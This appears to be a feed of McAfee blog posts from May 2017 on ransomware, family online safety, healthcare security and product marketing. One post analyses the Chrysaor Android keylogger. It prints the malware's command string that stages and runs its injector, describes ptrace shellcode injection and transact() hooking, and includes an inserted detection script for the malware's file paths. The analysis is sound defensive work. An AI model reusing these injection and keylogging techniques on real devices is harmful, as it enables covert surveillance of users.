The ideal threat intelligence strategy combines external sources with intelligence gathered from your own environment. Platforms should share intelligence across multiple layers of defenses in real time—automatically, without requiring administrators to swivel between interfaces. The platform should then immediately apply information gleaned from one infection to every other security system in your environment.

  5. Use advanced machine learning and the cloud for scale and speed.

Implementing and utilizing advanced machine learning capabilities, both locally and in the cloud, allows you to statistically compare suspicious executables against thousands of attributes of known threats—without signatures. The ability to analyze both static code features and an executable’s actual behavior allows you to uncover hidden threats in seconds.

  6. Consolidate agents and manual processes.

By consolidating multiple tools, systems, and reports into a single management console, manual processes are drastically decreased. By adopting a consolidated approach, you can reduce the number of agents your team administers and automate manual tasks with streamlined workflows. Instead of spending hours battling disparate interfaces, you empower your team to control multiple layers of endpoint security with automated, “set-it-and-forget-it” capabilities.

For more details on how other organizations are responding to their own endpoint security gaps, and Forrester’s recommendations to address them, watch the recording of our recent webcast: Mastering Endpoint Security with Guest Forrester Research.

Your data has been kidnapped… now what? | https://securingtomorrow.mcafee.com/business/neutralize-threats/your-data-has-been-kidnapped-now-what/ | Tue, 16 May 2017 17:34:29 +0000 | https://securingtomorrow.mcafee.com/?p=74139

The post Your data has been kidnapped… now what? appeared first on McAfee Blogs.

What’s it like to be held hostage? I never want to find out and I’ll bet you don’t either. But given today’s environment, executives might find themselves held hostage in a way they never expected. Ransomware, so called because it holds your entire computer system hostage, is quickly becoming the hacker’s method of choice because it’s simple, fast and virtually untraceable.

For the most part, companies that are victims have little choice (unless they’re properly prepared – more on that later) other than to pay the ransom, whatever it is, to end the attack. In fact, up until very recently even the FBI has recommended to victims that they pay up.

Ransomware attacks are different from what most people perceive as a cyberattack. There’s no theft of data or interest in stealing personal identification. Hackers don’t care if your company stores credit card information, medical records, login credentials or Social Security numbers. Instead, ransomware attacks leverage the importance of your business operation and access to your data, or what your computers control, to force you to pay up. And it happens. A lot.

In fact, it’s becoming so ubiquitous that the CyberThreat Alliance estimates it has seen 406,887 instances of just one type of “infection” and that the damage last year alone was $325 million. And that’s a soft number because it doesn’t account for the damage from lost time, productivity and reputation. $325 million is just what you can put your finger on.

So how does this work and why is it so effective? Simple: An email containing a link, attachment or embedded virus is sent to someone – anyone – in your organization. It might appear to come from the CEO, or from a large bank or credit card company. Using standard “phishing” techniques they’re bound to get at least one sucker to open the attachment and that’s all it takes. Once they open the email and click the link your entire organization could be held hostage for a ransom. What happens is that by clicking the link or downloading the file they’ve installed a piece of nefarious code that hackers will then use to encrypt your entire system with a key that only they have. But maybe not right away.

Imagine that your entire company and everything in it that is connected to the Internet – payment processing, manufacturing machinery, logistics control, physical security systems – essentially everything – grinds to a very loud screeching halt. Because the hackers were patient, they planted the seed for this weeks ago when an email contained a link to a file labeled “Account receipt.doc” or “Financial records.pdf” or some other tempting name. Nothing happened at the time (because the hackers planned it that way) and the code just waited. And waited. And waited some more until you receive a frightening and threatening email telling you that you need to pay up or you’ll lose access to every record your company maintains.

Worse, you’ll be completely locked out of every control, machine, logistics management software, sensor, camera, temperature regulator, voltage regulator and whatever else is on your network.

And your personnel records, inventory information, customer data and everything else that’s stored anywhere on your network? As the old-style thieves used to say, fuhgeddaboudit. You’re toast. And as the clock keeps ticking and the business losses pile up the board of directors and the executives are left with a simple choice: Pay the ransom to get the key to unlock your world or take the high road and refuse to pay but watch your business crumble.

There’s no right choice … but there’s no good choice, either. Ethics and principle demand that you stand your ground and not negotiate with criminals. Reality, however, is that your phone system doesn’t work, your factory is completely shut down, your ledgers, ordering system and everything else is eerily quiet. So you grind your teeth, bang your fist on the desk … and pay.

Or not. Maybe you don’t have to pay because you took the appropriate precautions. They’re relatively simple but the number of companies that don’t follow these simple guidelines would shock you.

  • Backup backup backup backup backup. That’s right – do it daily, weekly, monthly, quarterly and annually. Move the backups offline to another, totally separate network with completely different credentials and operations. That’s what cloud systems are great for – use them. Take snapshots of different types of data in different ways. Be absolutely totally obsessively compulsively fanatic about it. And then do it some more. If you have an unencrypted backup and are the victim of a ransomware attack you can laugh at the criminals while you restore a perfectly preserved snapshot of your system from the day, week or month before. It may not be up to the minute but it’ll be enough and you’ll thank yourself for doing it.
  • Educate your employees until they’re sick of hearing it. Tell them not to click links, insert USB thumb drives, open emails from anyone not in their address book and a dozen other things that can expose the entire company. Then do it again. And again – until it is seared into their memory to the point where they are all mildly paranoid. In today’s cybercrime world that’s a healthy state of mind.
  • Conduct a fire drill. Pick a day – preferably over a weekend or sometime when your normal business will not be heavily impacted and tell your IT department that you just got the worst scareware letter you’ve ever seen or have the IT department call you and tell you that every single aspect of your system is locked up. And then create a checklist of what to do, who is responsible for doing it and what can be done while you are bringing your backup online. Do you need to call customers, put up a message on your web page, make a public announcement or tell your employees? Figure it out now because when this happens you won’t be able to think about anything other than getting your operation restored.

Ransomware is nothing more than an old-fashioned kidnapping. But there isn’t just one person being held hostage, there’s an entire organization, your customers, your employees and, probably most dangerous of all … your reputation. Remember this: It takes years to build up a great reputation and just a moment to destroy it. Don’t let this happen to you. Don’t be a victim. Be diligent. Be prepared. Be cyber aware!

 

This article was written by Scott Goldman from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Feeling Overwhelmed, Parents? Here’s Your Online Safety Cheat Sheet | https://securingtomorrow.mcafee.com/consumer/family-safety/feeling-overwhelmed-parents-heres-your-online-safety-cheat-sheet/ | Tue, 16 May 2017 14:00:12 +0000 | https://securingtomorrow.mcafee.com/?p=73856

The post Feeling Overwhelmed, Parents? Here’s Your Online Safety Cheat Sheet appeared first on McAfee Blogs.

Can we just get an extra five hours tacked onto each day so we can stay on top of our kid’s online activity? That’s the rhetorical question most parents carry around unspoken. With all the to-dos of parenting, isn’t there a shortcut on all that social media stuff we don’t have to bookmark or save to read later (but never do)?

We hear you and, more than that, we feel you. The struggle between knowing and doing is very, very real if you are a parent in the digital arena.

We’ve learned that despite knowing the risks online, kids still engage in risky behavior and routinely hide it from their parents. We also know from a McAfee study conducted in 2015 that 46% of youth engaging in risky behavior online say they would change their behavior if they knew their parents were paying attention — a fact that slathers on even more parental remorse if it feels like you’ve fallen behind.

Becoming more involved in your child’s digital life doesn’t have to overwhelm or scare you off. So, while it’s not perfect, here’s a cheat sheet that will at least help you gain a sense of control over the place your kids spend most of their time. Most of all, this is all doable for busy parents.

10-point family safety cheat sheet

  1. Fire Up the Ground Rules. Success begins with a plan, and online safety is no different. So we start with establishing a plan or family ground rules. Caution: Do not skip this step. Why? Because life moves at warp speed and a child’s perception of reality and ‘what was said’ isn’t always going to match yours. Establish your ground rules, which include in-home media, and set both expectations and consequences. Not sure where to begin? Here’s a primer on ground rules. Make the revisions to fit your family and post the final standards in a place where everyone can reference them.
  2. Relationship Over Rules. Sometimes we simply do not realize that somewhere in the busyness of life we began to parent out of fear rather than a sense of faith in our kids and ourselves. This is where relationship becomes the #1 Internet safety tool a parent can possess. Connect with your children. Talk casually and frequently with your kids about what’s happening in their life, what’s up with school, friends, problems, and anything else important to them. Along the way, you’ll find out plenty about their online life and have the necessary permission (and trust) to work your concerns about online safety into any conversation.
  3. Restrict App Purchases. Skip this step, and you may discover a leak in your family finances to the tune of thousands of dollars. When so much of today’s purchases are “buy-with-one-click,” take the few steps needed to put purchasing restrictions in place. Set consequences. Coach your child along the way. It’s easy to yell “sure, go ahead,” from another room when asked about a download. The wiser thing is to sit with your child and go through individual transactions. To prevent unauthorized app purchases, go into the Settings on all your mobile devices and PCs and set up in-app purchase restrictions. Every purchase attempt should require password confirmation. If your child has his or her own phone, just be sure not to share your password or credit card information.
  4. Monitor Digital Devices. This step depends on your family ground rules, the age of your child, and the expectations you’ve set as a parent. Issues of privacy come up often in parenting circles and rightly so. However, monitoring comes down to being able to answer this question honestly: Has my child proven that he or she is responsible? If you decide to monitor, oversee the following: inappropriate apps, vault apps, text messages, and direct messages within Twitter, Facebook, Instagram, and Snapchat. Yes, you will need passwords to check all of these, so be sure to make password sharing a requirement in your family contract. Starting early with the practice of random monitoring will make it the standard as your kids get older. If you begin when they are teens, you may be in for a dogfight (so hang on tight).
  5. Ask Great Questions. Building trust with kids starts with asking great questions. Instead of deleting apps and getting angry about your child’s decisions, ask your child “what do you like about this app and why?” Instead of drilling your child on what he or she has seen online, ask “What would you do if you saw something inappropriate, dangerous, or frightening online?” Instead of restricting social media altogether if a digital conflict arises, ask “Tell me what you’d do if someone started bullying you online” or “How would you respond if you saw someone else being taunted or threatened online?”
  6. Secure Mobile and Home Devices. Research security standards before purchasing new devices. Compare devices, paying particular attention to safety standards. Read customer reviews and Google security issues. On your child’s device, set Location Settings to private. Do this for personal safety reasons as well as privacy reasons. Some apps have the ability to access GPS information and transfer personal data to third parties. Set up a family location tracker such as Find My Friends so that you know where your child is at all times. To deter theft, set up a device tracker such as Find My iPhone. Depending on age, trust level, and online activity, require kids to share personal passwords with you and show them how to safely change passwords every few months.
  7. Secure Your Home Network. Limit your circle of trust when it comes to your home network — doing so protects your whole family physically and financially. Be sure to name your home network something other than your family name and don’t be casual when it comes to giving out your password. Treat your network password the way you would a house key. Think about creating a guest network so visitors can connect without gaining access to your family’s other networked devices or shared files.
  8. Know Those Apps! One of the biggest threats to a child’s online safety is his or her choice in apps. Apps run the gamut of risk and range from educational and uplifting to inappropriate and dangerous. Go on your child’s phone regularly and check for risky apps. Google the app and read app reviews. Look at age restrictions and customer reviews so you will be better equipped to evaluate whether an app may be suitable for your child. App risks include cyberbullying, predators, sexting, hacking, and illegal behaviors. Dangerous apps include Kik Messenger, Yik Yak, Whisper, Ask.Fm, Tumblr, and any other social network that allows anonymous users.
  9. Safe Search and Filtering Software. Most every popular search engine will have a Safe Search feature on the platform’s home page. You can quickly turn on Safe Search features on popular sites like Google, YouTube, and Netflix. This is an excellent way to weed out the inappropriate images, content, movies, and videos. Safe search is a start but only skips a rock across the problem. To seriously guard your child against the potential of inappropriate content, research internet filtering software for both PCs and smartphones.
  10. Befriend Your Kids’ Friends. You won’t find this in many how-to safety blogs; however, outside of your relationship with your child, the biggest influence will be his or her friends. Those friends will significantly influence the decisions your child makes online and off. For that reason, it’s critical to stay connected with your child’s friends. Know who they are, know their parents, and know how they behave online. You don’t have to “follow” or “friend” other kids to gain a clear understanding of the influence they may have on your child.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

Healthcare security will only become more complicated | https://securingtomorrow.mcafee.com/business/safeguard-data/healthcare-security-will-only-become-more-complicated/ | Mon, 15 May 2017 23:00:19 +0000 | https://securingtomorrow.mcafee.com/?p=74111

The post Healthcare security will only become more complicated appeared first on McAfee Blogs.

The ability to protect and secure digital information is under constant threat. Attackers of all sorts force their way into systems, trick individuals into providing access and otherwise access data that is not their own.

In a state of continual threats, the issue of cybersecurity is typically at the forefront for many. Questions about cyber security include the following – can data actually be secure? Will defensive measures ever be better than offensive measures? And is it necessary to accept that all data will be hacked or inappropriately accessed at some point in time?

Given the uncertainty and focus, an analysis from the Center for Long-Term Cybersecurity at the University of California, Berkeley is particularly interesting. The analysis, Cybersecurity Futures 2020, contemplates five different scenarios for what cyber security and data will look like in the near future. Each scenario offers a glimpse into a possible future. The scenarios are all quite plausible and to some degree even represent current realities.

The scenarios, in brief summary, are:

The New Normal. In this scenario, it is accepted that data cannot be kept private and that personal information will be both stolen and broadcast. In response, individuals or institutions may respond by shutting off connections to the internet, proactively making information public before it can be inappropriately accessed or fight back with any tool that may become available.

Omega. This scenario is named after the “omega,” or last-algorithm, concept. The omega algorithm would be the last step before control is turned over to technology. With the omega algorithm in place, individualized predictive analytics would create new strata of security risks. Additionally, issues would become focused on individuals as opposed to infrastructure, which in turn could cause irreparable damage in a number of ways.

Bubble 2.0. In this scenario, a second bubble bursts when it comes to web-based companies. Decades after the dot-com bubble of the 1990s, the new web companies suffer a similar fate. However, the primary asset of each of these companies is a tremendous trove of personal data. The data do not disappear with the companies. Instead, the data will be sold. With data sets the main target of cybercriminals and increasing numbers of data scientists unemployed, cybersecurity and market security become entangled.

Intentional Internet of Things. In this scenario, the Internet of Things becomes seamlessly integrated into everyday life. In fact, certain core functions are turned over to technology. Such functions could include healthcare to a degree, environmental functions and other social or economic functions. As such, attackers may subtly infiltrate systems to manipulate the vast array of connected devices or have the opportunity to cause widespread harm. Cybersecurity becomes just security and must be a part of everyday life.

Sensorium (Internet of Emotion). In this scenario, devices move beyond physical functions and into an individual’s emotional state. Devices will track fundamental emotional aspects of an individual’s psychology. In turn, an individual’s mental or emotional state can be manipulated for any number of purposes. Cybersecurity evolves from data protection to managing and protecting an emotional public image.

The goal of the scenarios is not to identify what is occurring today, but to develop concepts of how the future may actually unfold. Once the potential futures are detailed, it is possible to study those futures and engage in strategic planning or set forth research priorities.

Starting from such a framework, it is easy to see why each scenario reflects some current realities. In fact, the currently existing world is likely a reflection of some components from each of the scenarios.

With these possible futures laid out, what does it mean for cybersecurity today? It means that cybersecurity should be considered as more than just a quick challenge or one that will remain the same. Changes in what cybersecurity means can already be seen on a daily basis. Threats are constantly evolving, changing or springing up completely new. What is known a week or month before has become obsolete to some degree.

A few overarching issues can also be teased out from the current state of cybersecurity and where the future may go. The human element will be both a primary concern and benefit. Individuals are currently the cause of many data breaches. Those causes include falling victim to a phishing attack, purposefully accessing data for malicious purposes or an unintentional action that exposes information, among other issues.

At the same time, individuals are actively trying to increase security measures and make it more difficult for a data security incident to occur. The opposing forces of human intervention will also be at the center of cybersecurity because so much of what happens in this world is about what humans are doing.

Another overarching issue is the role of data in the economy and as a resource. Much of the world economy centers around creation, curation and analysis of data. Product development and sales center on data because data help identify what product should be developed, how it should go to market and where it should be sold. From this perspective, data have become a commodity because they inform so many potential decisions. It may not be possible to fully separate data’s role as a driver of the economy from its role as a good within the economy, because the two are so intertwined.

The central importance of data to the economy means that it will be a constant target. If individuals and companies cannot secure data, then someone else will exploit the data. Accordingly, there is a fundamental monetary consideration driving the need to ensure security is in place and actually works.

The central role of data in so many aspects of life and the inability to ensure consistently appropriate individual behavior mean that there will never be a single solution for ensuring cybersecurity. Risks will always exist because, as the old saying goes, a system is only as strong as its weakest link. Since the weakest link is ever changing, all links can never be fully strengthened. Accepting that reality means that vigilance must be maintained.

A corollary to the lack of a cybersecurity silver bullet is that the attackers will also always be multiple steps ahead. Such is the nature of attack because those trying to gain access to a system are incentivized to come up with novel approaches. While security and defense can also identify a novel concept, it is just more likely for the other side to have already thought of and blown past an idea.

What impact do all of the predictions and pondering have for healthcare? What is true generally for cyber security will likely be equally if not more important for healthcare. The quantity of healthcare data is growing at exponential rates, and such data is among the most private and sensitive that can relate to an individual.

Additionally, healthcare is already not only under almost constant threat but is likely to fall victim to a successful attack. Any number of negative consequences can be imagined if the situation does not improve. Such negative outcomes could include individuals not trusting the system and withholding information, increasing amounts of fraud funneling money out of the system to illegitimate hands, or manipulation of data to influence or create outcomes. These concerns echo those of the scenarios because all are likely. Given the possibilities, healthcare is very much at a crossroads when it comes to security.

The future does not need to look grim. Alongside all of the potential nightmares are an equal, if not greater, number of improved benefits and outcomes. The issue is whether all will take up the challenge and work collaboratively for the good of everyone.

 

This article was written by Matthew Fisher from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Analysis of Chrysaor Keylogging Mechanism Shows Power of Simple Malicious Code | https://securingtomorrow.mcafee.com/mcafee-labs/analysis-chrysaor-keylogging-mechanism-shows-power-simple-malicious-code/ | Mon, 15 May 2017 22:31:31 +0000 | https://securingtomorrow.mcafee.com/?p=74083

The post Analysis of Chrysaor Keylogging Mechanism Shows Power of Simple Malicious Code appeared first on McAfee Blogs.

Many attacks on mobile devices use social engineering to initially infect a victim’s system. They download malware and elevate privileges by exploiting vulnerabilities. Mobile malware often uses persistence mechanisms to hide and monitor the victim’s behavior. Unlike personal computers, mobile devices are used more often by their owners, and carry sensitive information such as phone numbers, personal images, SMS messages, and other data that can be used to socially engineer more victims. Furthermore, mobile devices have cameras, microphones, and GPS that can be used to spy on the targets. Infected mobile devices expose users to greater risks than infected computers.

Recently Google and Lookout published information about the Android version of surveillance malware Pegasus (also known as Chrysaor, the brother of Pegasus in Greek myth). Pegasus infections were a big story last year. This year’s attacks are called Chrysaor (by Google) or Pegasus (by Lookout). When Chrysaor is installed, it leaks data of popular apps and remotely controls the device. The Lookout report covers all the features of the Chrysaor malware, but only briefly explains how the malware injects code and installs a hook for keylogging. We decided to analyze the Chrysaor sample in more detail to understand how its keylogging works. We analyzed the sample with the SHA-256 hash ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5.

Overview

The basic keylogging process.

The sample has two main binaries related to keylogging: addk.so and libk.so. When the sample executes, the former is copied to /data/local/tmp/inulmn and the latter to /data/local/tmp/libuml.so. The addk.so file injects shellcode into the memory space of the keyboard process (Step 1 in the preceding graphic). When the shellcode runs, it loads libk.so and calls the function init() (Step 2). This function installs a hook to capture user keystrokes to a file (Step 3).

To log keystrokes, a superuser binary, which manages access to root privileges, must be positioned at /system/csk or the keylogging code will not execute.

Checking for the superuser binary.

The following code shows part of a system command string for injecting /data/local/tmp/libuml.so to the keyboard process using the binary /data/local/tmp/inulmn.

Code for constructing the command string.

The fully constructed string:

    chown 0.0 /data/local/tmp/inulmn ;
    chown 0.0 /data/local/tmp/libuml.so ;
    chmod 0777 /data/local/tmp/inulmn ;
    chmod 0777 /data/local/tmp/libuml.so ;
    /data/local/tmp/inulmn <pid of keyboard process> /data/local/tmp/libuml.so init;

We can see that /data/local/tmp/inulmn executes, passing the process ID of the target process (the keyboard), the name of the binary to inject (/data/local/tmp/libuml.so), and the function to execute (init) as command-line parameters.

Finding the current input method process

To log user keystrokes, Chrysaor first queries the value of DEFAULT_INPUT_METHOD in secure system settings. This records the input method used by default and gets the method’s ID.

Gathering the ID of the system’s default input method (keyboard).

The malware then searches for the input method (keyboard) process in the list of running processes using the ID. When found, the malware extracts the ID of the process so that it can inject the code.

Code searching for ID of the keyboard process.

Injecting code

Once Chrysaor has found the ID of the keyboard process, it tries to inject its code and hook the function to log keystrokes. The native library addk.so injects code into the keyboard process and executes selected functions there using the ptrace API. Addk.so takes the target process’ PID, the path of the .so file to inject, and the function to execute as parameters. With this information, the malware finds the addresses of APIs such as dlsym(), dlopen(), and mmap() in the target process’ memory space using the proc filesystem.

Dynamically finding the addresses of APIs.

Using the /proc file system to search the memory space of the keyboard process.

The function address information is saved in the data segment adjacent to the shellcode, which executes the functions injected into the target process. The following image shows the shellcode that is copied to the target process’ memory space. The memory addresses in red boxes are resolved at runtime.

Shellcode for executing the injected functions.

Memory layout of shellcode and data.

The shellcode and related data such as API addresses, strings passed as function parameters, saved registers, and so on are all close together so they can be copied with one operation.

After addk.so attaches to the keyboard process and copies the shellcode and the related API addresses into the mmap()ed area using PTRACE_POKETEXT, it executes the shellcode by pointing the return frame at the shellcode address with PTRACE_SETREGS. The shellcode calls dlopen() through the copied remote address to load the library and then calls the injected function. Libk.so calls the init() function, which installs the keylogging hook. Addk.so passes the string “test” as the parameter of the injected function.

Logging keystrokes

The init() function installs an inline hook at the beginning of the IPCThreadState transact() function and logs the keystrokes.

Hooking the function IPCThreadState transact().

The following diagram shows the execution flow when the inline hook is installed on the transact() function:

Execution flow after hooking.

The init() function overwrites the first 8 bytes of transact() with an 8-byte hook that jumps to the keylogger. The original 8 bytes are copied to a separate memory area that holds stub code for jumping back into transact().

When the transact() function is called (Step 1), the installed keylogger executes first due to the hook code. The keylogger checks the function code to see whether it is 0x6 (setComposingText) or 0x8 (commitText). If true, the function calls android::Parcel::enforceInterface(“com.android.internal.view.IInputContext”) and reads the keystroke data from the parcel and logs it to a file. After the keylogging is complete (Step 2), the function executes the 8 bytes of instructions that were copied from the start of the transact() function. Finally the stub code runs (Step 3), which jumps back to transact() at offset +8.

Code to check the function code for keylogging.

The data passed to the transact() function when the function code is 0x6 or 0x8 is the character sequence of the user’s input. This value is encoded and written to /data/local/tmp/ktmu/ulmndd.tmp. After some time passes, this file is renamed to /data/local/tmp/ktmu/finidk.<timestamp>.

Logging keystrokes to a file.
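A host-side check for the artifacts just described, as an added example that is not from the McAfee analysis or from the malware: it flags the /system/csk superuser binary, any library mapped into the keyboard process from /data/local/tmp, and the keystroke files under /data/local/tmp/ktmu/. The /proc/<pid>/maps excerpt and the file listing are constructed samples, and the purely numeric form of the finidk.<timestamp> suffix is an assumption.

```python
"""Host-side triage for the Chrysaor keylogger artifacts described above.

Added example; not code from the McAfee analysis or from the malware.
It checks the three things the write-up names: the superuser binary at
/system/csk, a library mapped into the keyboard process from
/data/local/tmp, and keystroke log files under /data/local/tmp/ktmu/.
The /proc/<pid>/maps excerpt and the file listing are constructed samples
so the script runs offline; on a device you would read the real files.
"""
import re
from typing import Dict, Iterable, List

# Paths taken from the analysis above.
SU_BINARY = "/system/csk"
STAGING_DIR = "/data/local/tmp/"
KEYLOG_DIR = "/data/local/tmp/ktmu/"
# ulmndd.tmp is the live capture; it is later renamed finidk.<timestamp>.
# That the timestamp is purely numeric is an assumption.
KEYLOG_NAME = re.compile(r"^(ulmndd\.tmp|finidk\.\d+)$")

# Constructed /proc/<pid>/maps excerpt for an input-method process. The
# last line models libuml.so after injection via dlopen(); the others are
# ordinary system mappings.
SAMPLE_MAPS = """\
12c00000-12d00000 rw-p 00000000 00:00 0          [anon:dalvik-main space]
7f3a000000-7f3a021000 r-xp 00000000 fd:00 1234   /system/lib64/libc.so
7f3b000000-7f3b008000 r-xp 00000000 fd:00 5678   /system/lib64/libinputservice.so
7f3c000000-7f3c002000 r-xp 00000000 fd:00 9012   /data/local/tmp/libuml.so
"""

# Constructed file listing standing in for os.path.exists()/os.listdir().
SAMPLE_FILES = [
    "/system/csk",
    "/data/local/tmp/ktmu/ulmndd.tmp",
    "/data/local/tmp/ktmu/finidk.1493211300",
]


def injected_libraries(maps_text: str) -> List[str]:
    """Return file-backed mappings that come from the malware's staging dir.

    A legitimate input method loads its code from /system or its own APK,
    so anything mapped from /data/local/tmp is worth a closer look.
    """
    found: List[str] = []
    for line in maps_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # anonymous mapping with no path column
        path = fields[5]
        if path.startswith(STAGING_DIR) and path not in found:
            found.append(path)
    return found


def keylog_files(paths: Iterable[str]) -> List[str]:
    """Pick out the keystroke capture files named in the write-up."""
    hits: List[str] = []
    for p in paths:
        if p.startswith(KEYLOG_DIR) and KEYLOG_NAME.match(p[len(KEYLOG_DIR):]):
            hits.append(p)
    return hits


def triage(maps_text: str, existing_files: Iterable[str]) -> Dict[str, object]:
    """Run all three checks and summarise them in one dictionary."""
    files = list(existing_files)
    result: Dict[str, object] = {
        "su_binary_present": SU_BINARY in files,
        "injected_libs": injected_libraries(maps_text),
        "keylog_files": keylog_files(files),
    }
    result["suspicious"] = bool(
        result["su_binary_present"] or result["injected_libs"] or result["keylog_files"]
    )
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MAPS, SAMPLE_FILES).items():
        print(f"{key}: {value}")
```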

Conclusion

We have looked at how simple code can log user keystrokes in mobile devices. If the infected mobile device is an executive’s company phone, the situation is worse. An executive’s phone may contain corporate or business secrets, plus contacts of other executives, which can have a huge negative business impact if leaked. The mobility of phones requires they be treated differently than desktop computers from an incident-response perspective: It is more difficult to trace data leaks because of the characteristics of mobile devices. Thus organizations must create incident-response and other security policies for mobile devices. If corporations cannot secure their mobile devices, they are exposing a huge attack surface to cybercriminals.

Never install Android applications from unknown sources and always keep your device’s operating system up to date to help protect against attacks. These simple steps will significantly lower the chances of infection. If your device quickly loses battery power or generates an abnormal amount of network traffic, it may have been compromised—requiring a factory reset or a security solution to delete malware.

Stopping Ransomware in Its Tracks
https://securingtomorrow.mcafee.com/business/stopping-ransomware-tracks/
Mon, 15 May 2017 16:16:04 +0000

The post Stopping Ransomware in Its Tracks appeared first on McAfee Blogs.

At every partner visit I have, I hear about ransomware – the malware that makes our customers’ files unusable until they pay off the attacker. It’s everywhere, hitting large and small businesses with equal disruptions and damage. And customers are begging for help in keeping ransomware out of their endpoints and servers.

Just how bad is it? Ransomware is the “fastest growing malware threat, targeting users of all types – from the home user to the corporate network,” according to a recent U.S. government interagency report. An average of 4,000 ransomware attacks occurred daily in 2016, up a whopping 300 percent from the year before, the report states.

McAfee has the answer to this threat in Endpoint Security 10.5.

As I discussed in my previous blog, ENS 10.5 is McAfee’s most advanced endpoint security platform ever. It provides an array of detection, identification, and response capabilities, including machine-learning technology that quickly and efficiently spots ransomware and automatically shares detection intelligence with other endpoints. Speed is the means for thwarting ransomware attacks, and ENS 10.5 has it.

ENS 10.5 takes an even more vigorous and proactive approach to combatting ransomware. ENS 10.5 delivers multiple enhancements to McAfee Threat Intelligence, which has been renamed Adaptive Threat Protection to reflect the machine-learning technology underpinning it. These include the addition of new McAfee-defined queries for Real Protect and the Real Protect scanner, which inspects suspicious files and activities on an endpoint to detect malicious patterns using machine-learning techniques.

ENS 10.5 isn’t just about ransomware. The new product is a platform full of powerful threat prevention enhancements, including:

  • The ability to configure a Windows registry scan location for on-demand scans
  • The ability to create a custom Access Protection rule to protect Windows services
  • Management of Exploit Prevention signatures and Application Protection rules
  • The ability to display false-positive mitigation events using the Endpoint Security Threat Prevention: False Positive Mitigation Events query

Advanced malware and ransomware protection is critical today, but will become even more important over the next couple of years. We’re already seeing ransomware attack Internet of Things (IoT) devices as a means for getting into our customers’ networks. Soon, these attacks will prevent businesses from leveraging autonomous devices and cripple operations. Already, we’re seeing IoT devices being held for ransom in the power distribution and health care verticals.

Ransomware can turn a good day into a terrible one for a home user and a good month into a disaster for an enterprise. McAfee ENS 10.5 is built to detect and destroy zero-day malware to assure that customers’ days, weeks, months, and years are ransomware-free.

Our job is to help protect our mutual customers from the ransomware scourge. McAfee has a collection of information and resources for you to help guide customers through the migration from legacy products to ENS 10.5. Check out all of the ENS 10.5 sales, technical, and support resources available to you in the partner portal.

Together is Power!

Congrats to our 2017 Women of the Channel
https://securingtomorrow.mcafee.com/business/congrats-2017-women-channel/
Mon, 15 May 2017 14:00:38 +0000

The post Congrats to our 2017 Women of the Channel appeared first on McAfee Blogs.

I’m proud to announce that CRN has recognized five McAfee women for their ability to create and elevate channel partner programs, develop fresh go-to-market strategies, strengthen the channel’s network of partnerships and build creative new IT solutions. As part of this recognition, Jimena Acevdeo, channel programs and enablement manager; Pamela Boich, director, worldwide channel operations; Allison Clarke, director of global partner programs and enablement; Regan Ogner, senior director of global distribution sales; and Natalie Tomlin, director of channel sales, have been named to CRN’s prestigious 2017 Women of the Channel list.  Natalie Tomlin has also been named to the 2017 Power 100, an elite subset of its prestigious annual Women of the Channel list.

The executives who comprise this annual list span the IT channel, representing vendors, distributors, solution providers and other organizations that figure prominently in the channel ecosystem. Each is recognized for her outstanding leadership, vision and unique role in driving channel growth and innovation within their respective companies.

CRN editors select the Women of the Channel honorees based on their professional accomplishments, demonstrated expertise and ongoing dedication to the IT channel. The Power 100 belong to an exclusive group drawn from a larger list of women leaders whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

The 2017 Women of the Channel list is featured in the June issue of CRN Magazine and online at www.CRN.com/wotc.

Congrats again to these amazing women!

Jimena Acevdeo
Pamela Boich
Allison Clarke
Regan Ogner
Natalie Tomlin

Privacy Awareness Week 2017: It’s Time To Talk More To Your Kids
https://securingtomorrow.mcafee.com/consumer/family-safety/its-time-to-talk-more-to-your-kids/
Mon, 15 May 2017 00:40:51 +0000

The post Privacy Awareness Week 2017: It’s Time To Talk More To Your Kids appeared first on McAfee Blogs.

Attention, parents with kids between 8 and 17! Here’s a statistic that is probably going to make you squirm – apologies in advance. Conversations between Aussie parents and their kids about cyber safety have dropped an alarming 23% compared to previous years. Eeeekkk! This startling statistic is part of research conducted by McAfee and Life Education to mark the start of Privacy Awareness Week in Australia.

Let’s Look At The Key Stats

The research, entitled ‘Trust and Transparency in Australian Family Households’, surveyed over 1,000 Aussie adults and kids to gather insights on the online behaviour of both adults and kids. And the results are NOT great. We have taken our eye off the ball, parents, and we need to fix it ASAP!!! Here’s why:

  • Compared to previous years, conversations with our kids about online safety are down a whopping 23%!!
  • 41% of Aussie kids admit to hiding their online activity from their parents – an increase from 37% in previous years.
  • Our teens are using unreliable factors to determine how trustworthy apps and websites are, which has implications for their privacy. 83% of kids consider a site to be safe if ‘friends are using it’ while only 17% bother to check out the Terms & Conditions before they decide if they sign up.

We also need to take a good look at ourselves – the evidence is clear:

  • 2 out of 3 parents (66%) share their password with someone else.
  • 23% of parents do not have any restrictions in place to stop their children purchasing apps or making in-app purchases.
  • 41% of parents follow their kids on social media, compared with 66% in previous years.
  • Conversations about key online issues are down. In previous years 84% of us spoke to our kids about cyber bullying, whereas only 69% of us are doing so now.
McAfee Australia Privacy Awareness Week Infographic
For more on our survey visit www.mcafee-paw17.com.au

What Does This Mean For Us?

Many experts would agree that our generation is subject to challenges and pressures that previous generations never had to face. Whether it’s the constantly increasing cost of living and housing, the consequent work/family juggle to pay the bills, and of course the internet – we have lots on our plate. Many of us feel overwhelmed and time poor and that’s perfectly understandable.

However, we need to prioritise our children’s safety and that means upping the ante when it comes to teaching online safety. Schools do play a role here, but as parents it is our responsibility to ensure our kids are informed about the risks and pitfalls of the internet, and understand how to navigate this digital world while keeping their digital reputation and privacy intact.

Suggested Next Steps

So, here are five things you can do this week in your home to get cyber safety back on the agenda:

Discuss Scams

  • At dinner time, talk about some of the recent scams that have been in the news. The Australian government’s Scamwatch website is a good source, as are reputable news sites.
  • For conversations this week, you could focus on the Can You Hear Me? phone scam or the Internet Pop-Up Scams that allow hackers remote access to your computer and have cost Aussies more than $41,000 so far this year.

Audit Privacy Settings

  • Have your kids check all their social media accounts to ensure they are set to ‘private’ so only their true friends can see their private information.
